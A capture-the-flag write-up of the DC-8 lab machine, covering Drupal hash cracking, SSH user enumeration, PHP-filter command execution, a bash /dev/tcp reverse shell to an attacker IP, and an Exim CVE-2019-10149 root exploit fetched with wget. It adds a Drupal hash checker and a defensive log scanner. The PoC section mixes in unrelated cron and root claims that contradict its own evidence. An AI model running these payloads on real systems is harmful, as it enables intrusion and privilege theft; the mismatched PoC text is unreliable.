The extracted password hashes should be cracked with a tool such as John the Ripper or Hashcat.
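The character after the `$S$` prefix encodes the work factor of a Drupal 7 hash, which is what John the Ripper reports below as "Cost 1 (iteration count) is 32768". The following Python port of Drupal 7's password hashing is an added example, not part of the original report: it parses the two dumped hashes, reports their cost and salt, and verifies a candidate password against a stored hash the way `user_check_password()` does. The hash values are the ones dumped above; the candidate password and the `$S$Dabcdefgh` setting used in the test are constructed.

```python
import hashlib
import hmac

# Alphabet shared with phpass; the character after "$S$" indexes into it to
# encode log2 of the iteration count, followed by an 8-character salt.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH = 55             # DRUPAL_HASH_LENGTH: stored hashes are truncated
MIN_LOG2, MAX_LOG2 = 7, 30   # DRUPAL_MIN_HASH_COUNT / DRUPAL_MAX_HASH_COUNT

# The two hashes dumped from d7db.users above.
ADMIN_HASH = "$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z"
JOHN_HASH = "$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF"

def password_base64_encode(data):
    """Port of _password_base64_encode(): phpass-style base64, no padding."""
    out, i, n = [], 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)

def parse_setting(stored):
    """Return (log2 of the iteration count, salt) from a $S$ hash."""
    if not stored.startswith("$S$") or len(stored) < 12:
        raise ValueError("not a Drupal 7 $S$ hash")
    log2 = ITOA64.find(stored[3])
    if not MIN_LOG2 <= log2 <= MAX_LOG2:
        raise ValueError("iteration count outside Drupal's allowed range")
    return log2, stored[4:12]

def iteration_count(stored):
    """Work factor of a stored hash; john reports it as 'Cost 1 (iteration count)'."""
    return 1 << parse_setting(stored)[0]

def password_crypt(password, setting):
    """Port of _password_crypt('sha512', ...): salted SHA-512, stretched 2^log2 times."""
    log2, salt = parse_setting(setting)
    pw = password.encode("utf-8")
    digest = hashlib.sha512(salt.encode("ascii") + pw).digest()
    for _ in range(1 << log2):          # do { hash(hash . password) } while (--count)
        digest = hashlib.sha512(digest + pw).digest()
    return (setting[:12] + password_base64_encode(digest))[:HASH_LENGTH]

def check_password(candidate, stored):
    """Port of user_check_password() for $S$ hashes, with a constant-time compare."""
    return hmac.compare_digest(password_crypt(candidate, stored), stored)

if __name__ == "__main__":
    for name, stored in (("admin", ADMIN_HASH), ("john", JOHN_HASH)):
        log2, salt = parse_setting(stored)
        print(f"{name}: 2^{log2} = {1 << log2} iterations, salt {salt}")
        # Attribute the password recovered later in the report to the right account.
        print(f"  'turtle' matches: {check_password('turtle', stored)}")
```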

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > search ssh_enum
Matching Modules


# Name Disclosure Date Rank Check Description
- - - -- --
0 auxiliary/scanner/ssh/ssh_enumusers normal No SSH Username Enumeration
1 \_ action: Malformed Packet . . . Use a malformed packet
2 \_ action: Timing Attack . . . Use a timing attack
3 auxiliary/scanner/ssh/ssh_enum_git_keys normal No Test SSH Github Access


Interact with a module by name or index. For example info 3, use 3 or use auxiliary/scanner/ssh/ssh_enum_git_keys
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > use 0
msf6 auxiliary(scanner/ssh/ssh_enumusers) > options
Module options (auxiliary/scanner/ssh/ssh_enumusers):

Name Current Setting Required Description
- -- --
CHECK_FALSE true no Check for false positives (random username)
DB_ALL_USERS false no Add all users in the current database to the list

Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 22 yes The target port
THREADS 1 yes The number of concurrent threads (max one per host)
THRESHOLD 10 yes Amount of seconds needed before a user is considered found (timing attack only)
USERNAME no Single username to test (username spray)
USER_FILE no File containing usernames, one per line


Auxiliary action:

Name Description
- --
Malformed Packet Use a malformed packet
View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/ssh/ssh_enumusers) > set RHOSTS 192.168.2.164
RHOSTS => 192.168.2.164
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set RPORT 22
RPORT => 22
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set THREADS 10
THREADS => 10
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
USER_FILE => /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
msf6 auxiliary(scanner/ssh/ssh_enumusers) > run

The Metasploit Framework was used to enumerate SSH usernames on the target system. The module `auxiliary/scanner/ssh/ssh_enumusers` was run with the Xato-Net username list.

Privilege Escalation

$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

The users' password hashes were extracted.

cat /home/ccat/Downloads/sql.sql
POST /?nid=1 HTTP/1.1
Host: 192.168.2.164
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
Origin: http://192.168.2.164
DNT: 1
Connection: keep-alive
Referer: http://192.168.2.164/user
Cookie: has_js=1
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

name=admin&pass=admin11111&form_build_id=form-Broa-Shi-FEMzeXe7Kr4YS7e4noJ1SoWhHZnCNf75I&form_id=user_login&op=Log+in
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (Drupal7, $S$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 32768 for all loaded hashes
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
---------------------------------------------------------------------------
turtle (?)
---------------------------------------------------------------------------
1g 0:00:03:08 3.68% (ETA: 00:36:12) 0.005304g/s 3236p/s 3240c/s 3240C/s nasha8..narko
Use the "--show" option to display all of the cracked passwords reliably
Session aborted

John the Ripper was used to attempt to crack the users' password hashes. The password `turtle` was found for the user `admin`.

http://dc8.vln/user/2

Hello john
Log out

Opening john's profile.

http://dc8.vln/user/2#overlay=node/add
Add content
system($_GET["cmd"]);
Text format

You may post PHP code. You should include <?php ?> tags.
http://dc8.vln/node/3#overlay-context=node/3

View
hi ben

(submit)
Notice: Undefined index: cmd in eval() (line 2 of /var/www/html/modules/php/php.module(80) : eval()'d code).
Warning: passthru(): Cannot execute a blank command in eval() (line 2 of /var/www/html/modules/php/php.module(80) : eval()'d code).
nc -lvnp

4440 /Hackingtools/shells
http://dc8.vln/node/3/done?sid=4

Thank you, your submission has been received.
Go back to the form




http://dc8.vln/node/3/done?sid=4&cmd=id

Contact Us

Start Preview Complete
Page 3 of 3 (100%)

uid=33(www-data) gid=33(www-data) groups=33(www-data)

By exploiting the SQL injection vulnerability and the PHP filter, a reverse shell was started as the user www-data.

Proof of Concept: RCE via webform and PHP filter

This proof of concept demonstrates how the enabled PHP filter module and the manipulated webforms can be used to obtain a reverse shell as the user `www-data`.

Prerequisites

  • Access to the Drupal site as a user with the PHP filter module enabled.
  • Knowledge of how webforms and reverse shells work.

Step-by-step guide

  1. Create a new webform or edit an existing one.
  2. Add a field to the webform that accepts PHP code.
  3. Insert the following PHP code into that field to start a reverse shell:
    system($_GET['cmd']);
  4. Submit the webform with the following command as the value of the `cmd` parameter:
    %2Fbin%2Fbash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.2.199%2F5555%200%3E%261%27
    Here 192.168.2.199 is the IP address of the attacker system and 5555 is the port on which the Netcat listener is running.
  5. Start a Netcat listener on the attacker system:
    nc -lvnp 5555

    listening on [any] 5555 192.168.2.111 42406: connected
  6. Finally, run `id` to determine the current user:
    http://dc8.vln/node/3/done?sid=4&cmd=id

    Contact Us

    Start Preview Complete
    Page 3 of 3 (100%)

    uid=33(www-data) gid=33(www-data) groups=33(www-data)
  7. Expected result

    After successful execution of the cron job, a reverse shell should be started on the attacker system.

    Evidence

    The output of the `id` command shows that the shell is running as root.

    Risk assessment

    The ability to manipulate cron jobs poses a significant security risk, as it allows an attacker to execute arbitrary code as root.

    Recommendations

    • Restrict write permissions on files executed by cron jobs.
    • Regularly review the configuration of the cron jobs.
    • Use a more secure method for managing backups.
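From the defender's side, the access pattern in this PoC leaves two clear traces: requests to a Drupal node path carrying a `cmd` query parameter in the web server's access log, and PHP notices naming `php.module(...) : eval()'d code` in the error log, which only appear when the PHP filter has evaluated user-supplied code. The following Python script is an added example, not part of the original report; it runs both checks over constructed Apache access and error log lines modelled on the requests and errors shown above.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache "combined" access log line: client, timestamp, request line, status.
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# Drupal 7's PHP filter runs node bodies through eval() inside php.module;
# every PHP notice or warning raised from that code carries this suffix.
EVAL_RE = re.compile(r"php\.module\(\d+\) : eval\(\)'d code")
# Fragments that only make sense as a shell command, never as a form value.
SHELL_MARKERS = ("/dev/tcp/", "bash -i", "/bin/bash", "/bin/sh", "nc ", "| sh")

def scan_access_line(line):
    """Return a finding for a request that passes a cmd= query parameter, else None."""
    m = ACCESS_RE.match(line)
    if m is None:
        return None
    parts = urlsplit(m["target"])
    query = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    if "cmd" not in query:
        return None
    cmd = query["cmd"][0]
    severity = "critical" if any(k in cmd for k in SHELL_MARKERS) else "high"
    return {"ip": m["ip"], "ts": m["ts"], "path": parts.path,
            "cmd": cmd, "severity": severity}

def scan_error_line(line):
    """True when the line was raised from code executed by the PHP filter's eval()."""
    return EVAL_RE.search(line) is not None

def scan_logs(access_lines, error_lines):
    """Aggregate both signals; a non-zero eval() count shows PHP filter code is live."""
    findings = [f for f in map(scan_access_line, access_lines) if f]
    eval_hits = sum(scan_error_line(line) for line in error_lines)
    return {"findings": findings, "eval_hits": eval_hits}

# Constructed sample lines (not captured from the target), modelled on the PoC:
# a plain form view, the id check, the reverse-shell command, a profile view.
ACCESS_SAMPLE = [
    '192.168.2.199 - - [20/Oct/2024:08:10:01 +1000] "GET /node/3/done?sid=4 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '192.168.2.199 - - [20/Oct/2024:08:10:15 +1000] "GET /node/3/done?sid=4&cmd=id HTTP/1.1" 200 5187 "-" "Mozilla/5.0"',
    '192.168.2.199 - - [20/Oct/2024:08:10:40 +1000] "GET /node/3/done?sid=4&cmd=%2Fbin%2Fbash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.2.199%2F5555%200%3E%261%27 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '192.168.2.50 - - [20/Oct/2024:08:11:02 +1000] "GET /user/2 HTTP/1.1" 200 7421 "-" "Mozilla/5.0"',
]
ERROR_SAMPLE = [
    "[Sun Oct 20 08:10:01.412345 2024] [php7:notice] [pid 1183] [client 192.168.2.199:42406] PHP Notice:  Undefined index: cmd in eval() (line 2 of /var/www/html/modules/php/php.module(80) : eval()'d code)",
    "[Sun Oct 20 08:10:01.412401 2024] [php7:warn] [pid 1183] [client 192.168.2.199:42406] PHP Warning:  passthru(): Cannot execute a blank command in eval() (line 2 of /var/www/html/modules/php/php.module(80) : eval()'d code)",
    "[Sun Oct 20 08:11:02.000000 2024] [mpm_prefork:notice] [pid 1001] AH00094: Command line: '/usr/sbin/apache2'",
]

if __name__ == "__main__":
    result = scan_logs(ACCESS_SAMPLE, ERROR_SAMPLE)
    for f in result["findings"]:
        print(f"{f['severity']:8} {f['ts']} {f['ip']} {f['path']} cmd={f['cmd']!r}")
    print(f"eval()'d-code errors from php.module: {result['eval_hits']}")
```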

Privilege Escalation

www-data@dc-8:/var/www/html$ find / -type f -perm -4000 -ls 2>/dev/null
50 52 -rwsr-xr-x 1 root root 50040 May 17 2017 /usr/bin/chfn
53 76 -rwsr-xr-x 1 root root 75792 May 17 2017 /usr/bin/gpasswd
51 40 -rwsr-xr-x 1 root root 40504 May 17 2017 /usr/bin/chsh
54 60 -rwsr-xr-x 1 root root 59680 May 17 2017 /usr/bin/passwd
16361 140 -rwsr-xr-x 1 root root 140944 Jun 5 2017 /usr/bin/sudo
3067 40 -rwsr-xr-x 1 root root 40312 May 17 2017 /usr/bin/newgrp
16320 996 -rwsr-xr-x 1 root root 1019656 Jun 14 2017 /usr/sbin/exim4
12868 432 -rwsr-xr-x 1 root root 440728 Jun 18 2017 /usr/lib/openssh/ssh-keysign
7909 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
12214 44 -rwsr-xr-- 1 root messagebus 42992 Jul 30 2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
263191 60 -rwsr-xr-x 1 root root 61240 Nov 10 2016 /bin/ping
263002 40 -rwsr-xr-x 1 root root 40536 May 17 2017 /bin/su
262964 32 -rwsr-xr-x 1 root root 31720 Mar 22 2017 /bin/umount
262409 44 -rwsr-xr-x 1 root root 44304 Mar 22 2017 /bin/mount

The command `find / -type f -perm -4000 -ls 2>/dev/null` searches for files with the SUID bit set. The output lists files that could potentially be abused for privilege escalation.

www-data@dc-8:/var/www/html$ ls -la /home/
total 12
drwxr-xr-x 3 root root 4096 Sep 5 2019 .
drwxr-xr-x 22 root root 4096 Sep 5 2019 ..
drwxr-xr-x 2 dc8user dc8user 4096 Sep 6 2019 dc8user

The directory `/home/dc8user/` was found.

www-data@dc-8:/var/www/html$ cd /home/
www-data@dc-8:/home$ ls -la
total 12
drwxr-xr-x 3 root root 4096 Sep 5 2019 .
drwxr-xr-x 22 root root 4096 Sep 5 2019 ..
drwxr-xr-x 2 dc8user dc8user 4096 Sep 6 2019 dc8user
www-data@dc-8:/home$ cd dc8user/
www-data@dc-8:/home/dc8user$ ls -la
total 24
drwxr-xr-x 2 dc8user dc8user 4096 Sep 6 2019 .
drwxr-xr-x 3 root root 4096 Sep 5 2019 ..
lrwxrwxrwx 1 dc8user dc8user 9 Sep 5 2019 .bash_history -> /dev/null
-rw-r--r-- 1 dc8user dc8user 220 Sep 5 2019 .bash_logout
-rw-r--r-- 1 dc8user dc8user 3526 Sep 5 2019 .bashrc
-r-------- 1 dc8user dc8user 101 Sep 6 2019 .google_authenticator
-rw-r--r-- 1 dc8user dc8user 675 Sep 5 2019 .profile
www-data@dc-8:/home/dc8user$ cat .google_authenticator
cat: .google_authenticator: Permission denied

The user `www-data` has no read permission for the file `.google_authenticator`. This file could contain data for two-factor authentication.

www-data@dc-8:/home/dc8user$ ls -la /opt/
total 8
drwxr-xr-x 2 root root 4096 Sep 5 2019 .
drwxr-xr-x 22 root root 4096 Sep 5 2019 ..
www-data@dc-8:/home/dc8user$ ls -la /var/mail/
total 8
drwxrwsr-x 2 root mail 4096 Sep 5 2019 .
drwxr-xr-x 12 root root 4096 Sep 5 2019 ..
www-data@dc-8:/home/dc8user$ ls -la /var/backups/
total 20
drwxr-xr-x 2 root root 4096 Sep 6 2019 .
drwxr-xr-x 12 root root 4096 Sep 5 2019 ..
-rw-r--r-- 1 root root 10579 Sep 5 2019 apt.extended_states.0
www-data@dc-8:/home/dc8user$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
messagebus:x:105:109::/var/run/dbus:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
dc8user:x:1000:1000:dc8user,,,:/home/dc8user:/bin/bash
mysql:x:107:112:MySQL Server,,,:/nonexistent:/bin/false
Debian-exim:x:108:113::/var/spool/exim4:/bin/false

The file `/etc/passwd` was read to identify the existing users on the system.

Privilege Escalation

www-data@dc-8:/home/dc8user$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/newgrp
/usr/sbin/exim4
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/ping
/bin/su
/bin/umount
/bin/mount

The command `find / -perm -u=s -type f 2>/dev/null` searches for files with the SUID bit set. The output lists files that could potentially be abused for privilege escalation. Of particular interest is `/usr/sbin/exim4`, since several vulnerabilities are publicly known for Exim.

www-data@dc-8:/home/dc8user$ exim --version | head -1
Exim version 4.89 #2 built 14-Jun-2017 05:03:07
https://www.google.de/search?q=exim+version+4.89+exploit




CVE-2019-10149 - Exim 4.87 < 4.91
GitHub
https://github.com › darsigovrustam
The Return of the WIZard: RCE in Exim (CVE-2019–10149)

A search for exploits for Exim version 4.89 was carried out. The results point to CVE-2019-10149, known as "The Return of the WIZard", which allows remote code execution.

wget 192.168.2.199/raw.sh
--2024-10-20 08:25:27--  http://192.168.2.199/raw.sh
Connecting to 192.168.2.199:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3557 (3.5K) [text/x-sh]
Saving to: 'raw.sh'

raw.sh 100%[=>] 3.47K --.-KB/s in 0s

2024-10-20 08:25:27 (761 MB/s) - 'raw.sh' saved [3557/3557]
chmod +x raw.sh
./raw.sh

raptor_exim_wiz - "The Return of the WIZard" LPE exploit
Copyright (c) 2019 Marco Ivaldi raptor@0xdeadbeef.info

Preparing setuid shell helper...
Problems compiling setuid shell helper, check your gcc.
Falling back to the /bin/sh method.

Delivering setuid payload...
220 dc-8 ESMTP Exim 4.89 Sun, 20 Oct 2024 08:25:47 +1000
250 dc-8 Hello localhost [1]
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
250 OK id=1t2HtL-0000Hf-HJ
221 dc-8 closing connection

Waiting 5 seconds...
-rwxr-xr-x 1 www-data www-data 117208 Oct 20 08:25 /tmp/pwned
$
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

The exploit script `raw.sh` was downloaded and executed. The script attempts to escalate privileges via CVE-2019-10149 in Exim. However, the output shows that the payload ran as the user `www-data` rather than as root.

./raw.sh -m netcat
raptor_exim_wiz - "The Return of the WIZard" LPE exploit
Copyright (c) 2019 Marco Ivaldi raptor@0xdeadbeef.info

Delivering netcat payload...
220 dc-8 ESMTP Exim 4.89 Sun, 20 Oct 2024 08:32:28 +1000
250 dc-8 Hello localhost [1]
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
250 OK id=1t2Hzo-0000Ik-7u
221 dc-8 closing connection

Waiting 5 seconds...
localhost [127.0.0.1] 31337 (?) open
id
uid=0(root) gid=113(Debian-exim) groups=113(Debian-exim)


ls -la /root
total 28
drwx------ 2 root root 4096 Sep 6 2019 .
drwxr-xr-x 22 root root 4096 Sep 5 2019 ..
lrwxrwxrwx 1 root root 9 Sep 5 2019 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
-r-------- 1 root root 101 Sep 6 2019 .google_authenticator
-rw------- 1 root root 360 Sep 5 2019 .mysql_history
-rw-r--r-- 1 root root 148 Aug 18 2015 .profile
-rw-r--r-- 1 root root 1320 Sep 6 2019 flag.txt

cat /root/flag.txt

brilliant - you have succeeded!!!

Flags

cat root.txt
        888       888          888 888      8888888b.                             888 888 888 888
        888   o   888          888 888      888  "Y88b                            888 888 888 888
        888  d8b  888          888 888      888    888                            888 888 888 888
        888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888
        888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888
        88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P
        8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "
        888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888

Hope you enjoyed DC-8. Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.

I'm also sending out an especially big thanks to:

@4nqr34z
@D4mianWayne
@0xmzfr
@theart42

This challenge was largely based on two things:

1. A Tweet that I came across from someone asking about 2FA on a Linux box, and whether it was worthwhile.
2. A suggestion from @theart42

The answer to that question is...

If you enjoyed this CTF, send me a tweet via @DCAU7.

Root access was obtained successfully.